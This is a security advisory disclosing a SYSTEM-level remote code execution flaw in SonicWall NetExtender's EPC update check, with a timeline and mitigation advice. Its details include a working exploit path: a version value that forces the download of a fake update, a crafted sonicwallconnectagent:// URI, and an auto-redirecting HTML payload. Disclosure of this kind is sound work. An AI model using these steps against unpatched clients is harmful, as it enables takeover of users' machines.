Summary

The SonicWALL NetExtender VPN client for Windows, version 10.2.339 and earlier, contains a vulnerability allowing remote code execution (RCE) with SYSTEM privileges due to insufficient signature validation of EPC Client updates.

Impact

This vulnerability can be exploited in the following scenarios to achieve arbitrary code execution as SYSTEM.

• An attacker could convince a user to connect their NetExtender client to a malicious VPN server. The attacker can then deliver a fake EPC Client update signed with a valid (but potentially compromised or purchased) code-signing certificate. This results in arbitrary code execution with SYSTEM privileges.
• When the SMA Connect Agent is installed, attackers can exploit a custom URI handler to force the NetExtender client to connect to their server. Users only need to visit a malicious website and accept a browser prompt, or open a malicious document for the attack to succeed.
• A low-privileged user on the same machine can exploit this vulnerability to escalate their privileges to SYSTEM by connecting to a malicious server.

Affected Versions

This vulnerability affects SonicWall NetExtender Windows versions 10.2.339 and earlier. The issue has been resolved in version 10.2.341 and higher.

Mitigation Steps

To mitigate this vulnerability, upgrade to SonicWall NetExtender version 10.2.341 or later, which addresses this issue. If an immediate upgrade is not feasible, consider using a client firewall to restrict access to known, legitimate VPN endpoints to prevent users from inadvertently connecting to malicious servers.

References

• SonicWall PSIRT Advisory
• NachoVPN: Our Proof of Concept tool demonstrating the exploitation of vulnerabilities in various SSL VPN products, including this one, which we presented at SANS HackFest Hollywood 2024.

Timeline

• 2024-05-03: Vulnerability reported to SonicWall.
• 2024-06-05: SonicWall provided a suggested patch for testing.
• 2024-06-07: AmberWolf shared feedback on suggested patch.
• 2024-06-14: SonicWall advised they have addressed our feedback and shared a new patch.
• 2024-06-21: AmberWolf confirmed that the new patch addresses the additional issues identified.
• 2024-07-17: SonicWall advisory published.
• 2024-11-22: AmberWolf advisory published.

Vulnerability Details

During connection to the SonicWall SSL-VPN server, the NetExtender client makes a request to the SSL-VPN server to check whether there is an EPC Client update available.

It does this by making an HTTP GET request to: /cgi-bin/sslvpnclient?epcversionquery=nxw.

The server will then respond with a value, which appears to be a version number. During testing, this was observed as being set to 0x0:

NX_WINDOWS_EPC_VER: 0x00;

However, by setting this value to 0xFF, the client was subsequently observed to make another GET request to: /NACAgent.exe.

Responding to this web request with an unsigned executable with the same name resulted in an error being shown in the VPN client:

This error suggested that validation was being performed on the downloaded NACAgent.exe file.

Looking at NECore.dll, the file is downloaded and validated in the sub_1800471B0 function, which calls the signature validation function sub_18008F980 (renamed to ValidateSignature) in the decompiled code below:

The ValidateSignature function wraps a call to the WinVerifyTrust Windows API function, using the action GUID WINTRUST_ACTION_GENERIC_VERIFY_V2. This ensures that the authenticode signature chains to a trusted CA but does not verify whether the executable was signed by a specific publisher.

Therefore, simply signing the executable with a code-signing certificate which was trusted by the system (i.e. the certificate chained to a trusted root CA, or a custom root CA was installed), it is possible to pass the signature check, at which point the downloaded NACAgent.exe file would be executed as a child of the SonicWall NetExtender Service (NEService.exe), which runs as SYSTEM.

The result of this is that if an attacker can convince, or coerce a user to connect to a malicious SSL-VPN server, and is able to sign a malicious executable with a trusted code-signing certificate (i.e. buy one from a public CA), then they would be able to gain Remote Code Execution on an end-user’s workstation.

Furthermore, when the SMA Connect Agent is installed alongside the NetExtender, an attacker could cause a user to connect to their malicious SSL-VPN server via the custom URI handler.

The sonicwallconnectagent custom URI handler is registered by the SMA Connect Agent in the Windows registry as shown below:

This custom URI handler takes a path, such as the following example:

sonicwallconnectagent://eyJhY3Rpb24iOjEwLCJoZWxwZXJ2ZXJzaW9uIjoiMS4xLjQyIiwiaG9zdCI6IjE3Mi4xNy4xMjguMSIsInBvcnQiOiI0NDMiLCJ1c2VybmFtZSI6InVzZXIiLCJleHRlbmRpZCI6IkV0UUJ2MFp3elY0OGsxRVpaQ3JMU3ZwOGJLcFh4NFRCcGVISmlmOVUxczQ9In0

The URL path contains a Base64 encoded JSON object, which specifies the server that the client should connect to:

{
action: 10,
helperversion: "1.1.42",
host: "172.17.128.1",
port: "443",
username: "user",
extendid: "EtQBv0ZwzV48k1EZZCrLSvp8bKpXx4TBpeHJif9U1s4="
}

Therefore, by crafting a sonicwallconnectagent:// URL which contains a host value pointing to the IP address of the attacker’s malicious SSL-VPN server, this URI handler can be abused to exploit the vulnerability from the user’s browser.

An example HTML file is shown below, which demonstrates this:

<html><head></head><body><script>window.location.href='sonicwallconnectagent://eyJhY3Rpb24iOjEwLCJoZWxwZXJ2ZXJzaW9uIjoiMS4xLjQyIiwiaG9zdCI6IjE3Mi4xNy4xMjguMSIsInBvcnQiOiI0NDMiLCJ1c2VybmFtZSI6InVzZXIiLCJleHRlbmRpZCI6IkV0UUJ2MFp3elY0OGsxRVpaQ3JMU3ZwOGJLcFh4NFRCcGVISmlmOVUxczQ9In0%3D';</script></body></html>

If a user was to visit this page in Microsoft Edge, they would be prompted to open the link in SonicWall SMA Connect Agent, as shown below:

At this point, the NetExtender client will connect to the attacker’s malicious SSL-VPN server, which would serve the fake, but signed NACAgent.exe executable file.

A prompt is then shown in the NetExtender client, advising the user that an EPC Agent update is required.

However, if this prompt is ignored, or the user clicks OK, the update continues and the malicious NACAgent.exe executable is executed with SYSTEM privileges.

To demonstrate this issue, a NACAgent.exe binary was served, which simply launches the cmd.exe executable as SYSTEM on the current user’s desktop:

As shown in the following process tree, the NACAgent.exe (and subsequent cmd.exe), is a child of the NEService.exe service process:

Demo

The following demo video illustrate how this vulnerability can be exploited to launch a Mythic C2 beacon via a rogue VPN endpoint.